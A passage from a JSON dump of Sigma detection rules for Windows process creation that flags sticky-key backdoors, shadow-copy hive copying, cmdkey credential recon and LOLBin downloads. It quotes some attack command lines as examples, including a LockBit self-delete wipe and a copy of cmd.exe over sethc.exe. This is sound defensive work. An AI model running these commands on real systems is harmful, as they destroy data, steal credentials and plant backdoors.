ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 \"C:\\Users\\User\\Desktop\\lockbit\\lockbit.exe\" & Del /f /q \"C:\\Users\\User\\Desktop\\lockbit\\lockbit.exe\".\n    selection_count:\n        CommandLine|contains|windash: ' -n '\n    selection_nul:\n        CommandLine|contains: 'Nul' # Covers \"> Nul\" and \">Nul \"\n    selection_del_param:\n        CommandLine|contains|windash:\n            - ' -f '\n            - ' -q '\n    selection_all:\n        CommandLine|contains|all:\n            - 'ping' # Covers \"ping\" and \"ping.exe\"\n            - 'del '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml",
    "content": "title: Potentially Suspicious CMD Shell Output Redirect\nid: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892\nrelated:\n    - id: aa2efee7-34dd-446e-8a37-40790a66efd7\n      type: derived\n    - id: 4f4eaa9f-5ad4-410c-a4be-bc6132b0175a\n      type: similar\nstatus: test\ndescription: |\n    Detects inline Windows shell commands redirecting output via the \">\" symbol to a suspicious location.\n    This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as \"hostname\" and \"dir\" to files for future exfiltration.\nreferences:\n    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-12\nmodified: 2024-03-19\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_cli_1:\n        CommandLine|contains:\n            # Note: Add more suspicious locations as you find them\n            # Note: The space from the start is missing to cover append operations \">>\"\n            # Note: We use the \"?\" to account for both a single and a double quote\n            # Note: If you want to account for more spaces which is still a valid bypass option. Use a regex with \"\\s\"\n            - '>?%APPDATA%\\'\n            - '>?%TEMP%\\'\n            - '>?%TMP%\\'\n            - '>?%USERPROFILE%\\'\n            - '>?C:\\ProgramData\\'\n            - '>?C:\\Temp\\'\n            - '>?C:\\Users\\Public\\'\n            - '>?C:\\Windows\\Temp\\'\n    selection_cli_2:\n        CommandLine|contains:\n            - ' >'\n            - '\">'\n            - \"'>\"\n        CommandLine|contains|all:\n            - 'C:\\Users\\'\n            - '\\AppData\\Local\\'\n    condition: selection_img and 1 of selection_cli_*\nfalsepositives:\n    - Legitimate admin or third party scripts used for diagnostic collection might generate some false positives\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution.yml",
    "content": "title: Directory Removal Via Rmdir\nid: 41ca393d-538c-408a-ac27-cf1e038be80c\nstatus: test\ndescription: |\n    Detects execution of the builtin \"rmdir\" command in order to delete directories.\n    Adversaries may delete files left behind by the actions of their intrusion activity.\n    Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\n    Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase\nauthor: frack113\ndate: 2022-01-15\nmodified: 2023-03-07\ntags:\n    - attack.defense-evasion\n    - attack.t1070.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_rmdir:\n        CommandLine|contains: 'rmdir'\n    selection_flags:\n        CommandLine|contains:\n            - '/s'\n            - '/q'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: low\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_shadowcopy_access.yml",
    "content": "title: Copy From VolumeShadowCopy Via Cmd.EXE\nid: c73124a7-3e89-44a3-bdc1-25fe4df754b1\nstatus: test\ndescription: Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)\nreferences:\n    - https://twitter.com/vxunderground/status/1423336151860002816?s=20\n    - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection\n    - https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/\nauthor: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)\ndate: 2021-08-09\nmodified: 2023-03-07\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # cmd /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM\\\n        # There is an additional \"\\\" to escape the special \"?\"\n        CommandLine|contains|all:\n            - 'copy '\n            - '\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy'\n    condition: selection\nfalsepositives:\n    - Backup scenarios using the commandline\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_stdin_redirect.yml",
    "content": "title: Read Contents From Stdin Via Cmd.EXE\nid: 241e802a-b65e-484f-88cd-c2dc10f9206d\nrelated:\n    - id: 00a4bacd-6db4-46d5-9258-a7d5ebff4003\n      type: obsolete\nstatus: test\ndescription: Detect the use of \"<\" to read and potentially execute a file via cmd.exe\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md\n    - https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-07\ntags:\n    - attack.execution\n    - attack.t1059.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cmd:\n        - OriginalFileName: 'Cmd.Exe'\n        - Image|endswith: '\\cmd.exe'\n    selection_cli:\n        CommandLine|contains: '<'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml",
    "content": "title: Sticky Key Like Backdoor Execution\nid: 2fdefcb3-dbda-401e-ae23-f0db027628bc\nrelated:\n    - id: baca5663-583c-45f9-b5dc-ea96a22ce542\n      type: derived\nstatus: test\ndescription: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen\nreferences:\n    - https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors\nauthor: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community\ndate: 2018-03-15\nmodified: 2023-03-07\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.008\n    - car.2014-11-003\n    - car.2014-11-008\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\winlogon.exe'\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\wscript.exe'\n            - '\\wt.exe'\n        CommandLine|contains:\n            - 'sethc.exe'\n            - 'utilman.exe'\n            - 'osk.exe'\n            - 'Magnify.exe'\n            - 'Narrator.exe'\n            - 'DisplaySwitch.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml",
    "content": "title: Persistence Via Sticky Key Backdoor\nid: 1070db9a-3e5d-412e-8e7b-7183b616e1b3\nstatus: test\ndescription: |\n    By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\n    When the sticky keys are \"activated\" the privilleged shell is launched.\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html\n    - https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf\n    - https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors\nauthor: Sreeman\ndate: 2020-02-18\nmodified: 2023-03-07\ntags:\n    - attack.persistence\n    - attack.t1546.008\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'copy '\n            - '/y '\n            - 'C:\\windows\\system32\\cmd.exe C:\\windows\\system32\\sethc.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_type_arbitrary_file_download.yml",
    "content": "title: Potential Download/Upload Activity Using Type Command\nid: aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f\nstatus: test\ndescription: Detects usage of the \"type\" command to download/upload data from WebDAV server\nreferences:\n    - https://mr0range.com/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-14\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    # Note that since built in CMD commands do not trigger a process creation. This would be detected only if used in a \"/c\" command\n    selection_upload:\n        CommandLine|contains|all:\n            - 'type '\n            - ' > \\\\\\\\'\n    selection_download:\n        CommandLine|contains|all:\n            - 'type \\\\\\\\'\n            - ' > ' # Space are added to increase atom length and speed up matching. If your backend can handle this remove the space\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_unusual_parent.yml",
    "content": "title: Unusual Parent Process For Cmd.EXE\nid: 4b991083-3d0e-44ce-8fc4-b254025d8d4b\nstatus: test\ndescription: Detects suspicious parent process for cmd.exe\nreferences:\n    - https://www.elastic.co/guide/en/security/current/unusual-parent-process-for-cmd.exe.html\nauthor: Tim Rauch, Elastic (idea)\ndate: 2022-09-21\nmodified: 2023-12-05\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\cmd.exe'\n        ParentImage|endswith:\n            - '\\csrss.exe'\n            - '\\ctfmon.exe'\n            - '\\dllhost.exe'\n            - '\\epad.exe'\n            - '\\FlashPlayerUpdateService.exe'\n            - '\\GoogleUpdate.exe'\n            - '\\jucheck.exe'\n            - '\\jusched.exe'\n            - '\\LogonUI.exe'\n            - '\\lsass.exe'\n            - '\\regsvr32.exe'\n            - '\\SearchIndexer.exe'\n            - '\\SearchProtocolHost.exe'\n            - '\\SIHClient.exe'\n            - '\\sihost.exe'\n            - '\\slui.exe'\n            - '\\spoolsv.exe'\n            - '\\sppsvc.exe'\n            - '\\taskhostw.exe'\n            - '\\unsecapp.exe'\n            - '\\WerFault.exe'\n            - '\\wermgr.exe'\n            - '\\wlanext.exe'\n            - '\\WUDFHost.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml",
    "content": "title: New Generic Credentials Added Via Cmdkey.EXE\nid: b1ec66c6-f4d1-4b5c-96dd-af28ccae7727\nstatus: test\ndescription: |\n    Detects usage of \"cmdkey.exe\" to add generic credentials.\n    As an example, this can be used before connecting to an RDP session via command line interface.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-03\nmodified: 2024-03-05\ntags:\n    - attack.credential-access\n    - attack.t1003.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\cmdkey.exe'\n        - OriginalFileName: 'cmdkey.exe'\n    selection_cli_generic:\n        CommandLine|contains|windash: ' -g' # Generic\n    selection_cli_user:\n        CommandLine|contains|windash: ' -u' # User\n    selection_cli_password:\n        CommandLine|contains|windash: ' -p' # Password\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage for administration purposes\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: RDP to DomainController\n      technique: T1021.001\n      atomic_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml",
    "content": "title: Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE\nid: 07f8bdc2-c9b3-472a-9817-5a670b872f53\nstatus: test\ndescription: Detects usage of cmdkey to look for cached credentials on the system\nreferences:\n    - https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation\n    - https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx\n    - https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1003.005/T1003.005.md#atomic-test-1---cached-credential-dump-via-cmdkey\nauthor: jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-01-16\nmodified: 2024-03-05\ntags:\n    - attack.credential-access\n    - attack.t1003.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\cmdkey.exe'\n        - OriginalFileName: 'cmdkey.exe'\n    selection_cli:\n        CommandLine|contains|windash: ' -l'\n    condition: all of selection*\nfalsepositives:\n    - Legitimate administrative tasks\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_cmdkey_recon/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Cached Credential Dump via Cmdkey\n      technique: T1003.005\n      atomic_guid: 56506854-89d6-46a3-9804-b7fde90791f9\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmdl32_arbitrary_file_download.yml",
    "content": "title: Potential Arbitrary File Download Via Cmdl32.EXE\nid: f37aba28-a9e6-4045-882c-d5004043b337\nstatus: test\ndescription: |\n    Detects execution of Cmdl32 with the \"/vpn\" and \"/lan\" flags.\n    Attackers can abuse this utility in order to download arbitrary files via a configuration file.\n    Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/\n    - https://twitter.com/SwiftOnSecurity/status/1455897435063074824\n    - https://github.com/LOLBAS-Project/LOLBAS/pull/151\nauthor: frack113\ndate: 2021-11-03\nmodified: 2024-04-22\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\cmdl32.exe'\n        - OriginalFileName: CMDL32.EXE\n    selection_cli:\n        CommandLine|contains|all:\n            - '/vpn'\n            - '/lan'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml",
    "content": "title: CMSTP Execution Process Creation\nid: 7d4cdc5a-0076-40ca-aac8-f7e714570e47\nstatus: stable\ndescription: Detects various indicators of Microsoft Connection Manager Profile Installer execution\nreferences:\n    - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/\nauthor: Nik Seetharaman\ndate: 2018-07-16\nmodified: 2020-12-23\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218.003\n    - attack.g0069\n    - car.2019-04-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # CMSTP Spawning Child Process\n    selection:\n        ParentImage|endswith: '\\cmstp.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate CMSTP use (unlikely in modern enterprise environments)\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_comodo_ssh_shellhost_cmd_spawn.yml",
    "content": "title: OpenEDR Spawning Command Shell\nid: 7f3a9c2d-4e8b-4a7f-9d3e-5c6f8a9b2e1d\nstatus: experimental\ndescription: |\n    Detects the OpenEDR ssh-shellhost.exe spawning a command shell (cmd.exe) or PowerShell with PTY (pseudo-terminal) capabilities.\n    This may indicate remote command execution through OpenEDR's remote management features, which could be legitimate administrative activity or potential abuse of the remote access tool.\n    Threat actors may leverage OpenEDR's remote shell capabilities to execute commands on compromised systems, facilitating lateral movement or other command-and-control operations.\nauthor: '@kostastsale'\ndate: 2026-02-19\nreferences:\n    - https://kostas-ts.medium.com/detecting-abuse-of-openedrs-permissive-edr-trial-a-security-researcher-s-perspective-fc55bf53972c\ntags:\n    - attack.execution\n    - attack.t1059.003\n    - attack.lateral-movement\n    - attack.t1021.004\n    - attack.command-and-control\n    - attack.t1219\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        ParentImage|endswith: '\\ITSMService.exe'\n        Image|endswith: '\\ssh-shellhost.exe'\n        CommandLine|contains: '--pty'\n    selection_cli_shell:\n        CommandLine|contains:\n            - 'bash'\n            - 'cmd'\n            - 'powershell'\n            - 'pwsh'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of OpenEDR for remote command execution\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_configsecuritypolicy_download_file.yml",
    "content": "title: Arbitrary File Download Via ConfigSecurityPolicy.EXE\nid: 1f0f6176-6482-4027-b151-00071af39d7e\nstatus: test\ndescription: |\n    Detects the execution of \"ConfigSecurityPolicy.EXE\", a binary part of Windows Defender used to manage settings in Windows Defender.\n    Users can configure different pilot collections for each of the co-management workloads.\n    It can be abused by attackers in order to upload or download files.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/\nauthor: frack113\ndate: 2021-11-26\nmodified: 2022-05-16\ntags:\n    - attack.exfiltration\n    - attack.t1567\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - CommandLine|contains: ConfigSecurityPolicy.exe\n        - Image|endswith: '\\ConfigSecurityPolicy.exe'\n        - OriginalFileName: 'ConfigSecurityPolicy.exe'\n    selection_url:\n        CommandLine|contains:\n            - 'ftp://'\n            - 'http://'\n            - 'https://'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_conhost_headless_powershell.yml",
    "content": "title: Powershell Executed From Headless ConHost Process\nid: 056c7317-9a09-4bd4-9067-d051312752ea\nrelated:\n    - id: 00ca75ab-d5ce-43be-b86c-55ff39c6abfc\n      type: derived\nstatus: test\ndescription: |\n    Detects the use of powershell commands from headless ConHost window.\n    The \"--headless\" flag hides the windows from the user upon execution.\nreferences:\n    - https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\nauthor: Matt Anderson (Huntress)\ndate: 2024-07-23\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1059.003\n    - attack.t1564.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\conhost.exe'\n        - OriginalFileName: 'CONHOST.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - '--headless'\n            - 'powershell'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_conhost_headless_powershell/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_conhost_legacy_option.yml",
    "content": "title: Suspicious High IntegrityLevel Conhost Legacy Option\nid: 3037d961-21e9-4732-b27a-637bcc7bf539\nstatus: test\ndescription: ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.\nreferences:\n    - https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29\n    - https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/\n    - https://learn.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control\nauthor: frack113\ndate: 2022-12-09\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        IntegrityLevel:\n            - 'High'\n            - 'S-1-16-12288'\n        CommandLine|contains|all:\n            - 'conhost.exe'\n            - '0xffffffff'\n            - '-ForceV1'\n    condition: selection\nfalsepositives:\n    - Very Likely, including launching cmd.exe via Run As Administrator\nlevel: informational\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_conhost_path_traversal.yml",
    "content": "title: Conhost.exe CommandLine Path Traversal\nid: ee5e119b-1f75-4b34-add8-3be976961e39\nstatus: test\ndescription: detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking\nreferences:\n    - https://pentestlab.blog/2020/07/06/indirect-command-execution/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-14\ntags:\n    - attack.execution\n    - attack.t1059.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentCommandLine|contains: 'conhost'\n        CommandLine|contains: '/../../'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml",
    "content": "title: Uncommon Child Process Of Conhost.EXE\nid: 7dc2dedd-7603-461a-bc13-15803d132355\nrelated:\n    - id: dfa03a09-8b92-4d83-8e74-f72839b1c407\n      type: similar\nstatus: test\ndescription: Detects uncommon \"conhost\" child processes. This could be a sign of \"conhost\" usage as a LOLBIN or potential process injection activity.\nreferences:\n    - http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/\nauthor: omkar72\ndate: 2020-10-25\nmodified: 2023-12-11\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\conhost.exe'\n    filter_main_conhost:\n        Image|endswith: ':\\Windows\\System32\\conhost.exe'\n    filter_main_null:\n        Image: null\n    filter_main_empty:\n        Image: ''\n    filter_optional_provider:\n        Provider_Name: 'SystemTraceProvider-Process'  # Race condition with SystemTrace doesn't provide all fields.\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_conhost_susp_winshell_child_process.yml",
    "content": "title: Potentially Suspicious Child Processes Spawned by ConHost\nid: dfa03a09-8b92-4d83-8e74-f72839b1c407\nrelated:\n    - id: 7dc2dedd-7603-461a-bc13-15803d132355\n      type: similar\nstatus: experimental\ndescription: Detects suspicious child processes related to Windows Shell utilities spawned by `conhost.exe`, which could indicate malicious activity using trusted system components.\nreferences:\n    - https://tria.ge/241015-l98snsyeje/behavioral2\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-02-05\ntags:\n    - attack.t1202\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\conhost.exe'\n    selection_child:\n        - Image|endswith:\n              - '\\cmd.exe'             # Windows Command Prompt\n              - '\\cscript.exe'         # Windows Script Host (used for scripting exploits)\n              - '\\mshta.exe'           # MSHTA (HTML Application Host, often abused)\n              - '\\powershell_ise.exe'  # PowerShell ISE\n              - '\\powershell.exe'      # Windows PowerShell\n              - '\\pwsh.exe'            # PowerShell Core\n              - '\\regsvr32.exe'        # Windows Registry Server (commonly used for exploits)\n              - '\\wscript.exe'         # Windows Script Host (for executing scripts)\n        - OriginalFileName:\n              - 'cmd.exe'\n              - 'cscript.exe'\n              - 'mshta.exe'\n              - 'powershell_ise.exe'\n              - 'powershell.exe'\n              - 'pwsh.dll'\n              - 'regsvr32.exe'\n              - 'wscript.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrative tasks using `conhost.exe` to spawn child processes such as `cmd.exe`, `powershell.exe`, or `regsvr32.exe`.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_conhost_uncommon_parent.yml",
    "content": "title: Conhost Spawned By Uncommon Parent Process\nid: cbb9e3d1-2386-4e59-912e-62f1484f7a89\nstatus: test\ndescription: Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.\nreferences:\n    - https://www.elastic.co/guide/en/security/current/conhost-spawned-by-suspicious-parent-process.html\nauthor: Tim Rauch, Elastic (idea)\ndate: 2022-09-28\nmodified: 2025-03-06\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\conhost.exe'\n        ParentImage|endswith:\n            - '\\explorer.exe'\n            # - '\\csrss.exe'  # Legitimate parent as seen in EchoTrail https://www.echotrail.io/insights/search/csrss.exe\n            # - '\\ctfmon.exe'  # Seen several times in a testing environment\n            # - '\\dllhost.exe'  # FP on clean system from grandparent 'svchost.exe -k DcomLaunch -p'\n            - '\\lsass.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\services.exe'\n            - '\\smss.exe'\n            - '\\spoolsv.exe'\n            - '\\svchost.exe'\n            - '\\userinit.exe'\n            # - '\\wermgr.exe'  # Legitimate parent as seen in EchoTrail https://www.echotrail.io/insights/search/wermgr.exe\n            - '\\wininit.exe'\n            - '\\winlogon.exe'\n    filter_main_svchost:\n        ParentCommandLine|contains:\n            - '-k apphost -s AppHostSvc'\n            - '-k imgsvc'\n            - '-k localService -p -s RemoteRegistry'\n            - '-k LocalSystemNetworkRestricted -p -s NgcSvc'\n            - '-k NetSvcs -p -s NcaSvc'\n            - '-k netsvcs -p -s NetSetupSvc'\n            - '-k netsvcs -p -s wlidsvc'\n            - '-k NetworkService -p -s DoSvc'\n            - '-k wsappx -p -s AppXSvc'\n            - '-k wsappx -p -s ClipSVC'\n            - '-k wusvcs -p -s WaaSMedicSvc'\n    filter_optional_dropbox:\n        ParentCommandLine|contains:\n            - 'C:\\Program Files (x86)\\Dropbox\\Client\\'\n            - 'C:\\Program Files\\Dropbox\\Client\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_control_panel_item.yml",
    "content": "title: Control Panel Items\nid: 0ba863e6-def5-4e50-9cea-4dd8c7dc46a4\nstatus: test\ndescription: Detects the malicious use of a control panel item\nreferences:\n    - https://ired.team/offensive-security/code-execution/code-execution-through-control-panel-add-ins\nauthor: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)\ndate: 2020-06-22\nmodified: 2023-10-11\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218.002\n    - attack.persistence\n    - attack.t1546\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_reg_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_reg_cli:\n        CommandLine|contains|all:\n            - 'add'\n            - 'CurrentVersion\\Control Panel\\CPLs'\n    selection_cpl:\n        CommandLine|endswith: '.cpl'\n    filter_cpl_sys:\n        CommandLine|contains:\n            - '\\System32\\'\n            - '%System%'\n            - '|C:\\Windows\\system32|'\n    filter_cpl_igfx:\n        CommandLine|contains|all:\n            - 'regsvr32 '\n            - ' /s '\n            - 'igfxCPL.cpl'\n    condition: all of selection_reg_* or (selection_cpl and not 1 of filter_cpl_*)\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_createdump_lolbin_execution.yml",
    "content": "title: CreateDump Process Dump\nid: 515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48\nrelated:\n    - id: 1a1ed54a-2ba4-4221-94d5-01dee560d71e\n      type: similar\nstatus: test\ndescription: Detects uses of the createdump.exe LOLOBIN utility to dump process memory\nreferences:\n    - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/\n    - https://twitter.com/bopin2020/status/1366400799199272960\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-01-04\nmodified: 2022-08-19\ntags:\n    - attack.defense-evasion\n    - attack.t1036\n    - attack.t1003.001\n    - attack.credential-access\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\createdump.exe'\n        - OriginalFileName: 'FX_VER_INTERNALNAME_STR'\n    selection_cli:\n        CommandLine|contains:\n            - ' -u ' # Short version of '--full'\n            - ' --full '\n            - ' -f ' # Short version of '--name'\n            - ' --name '\n            - '.dmp '\n    condition: all of selection_*\nfalsepositives:\n    - Command lines that use the same flags\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_credential_guard_registry_tampering.yml",
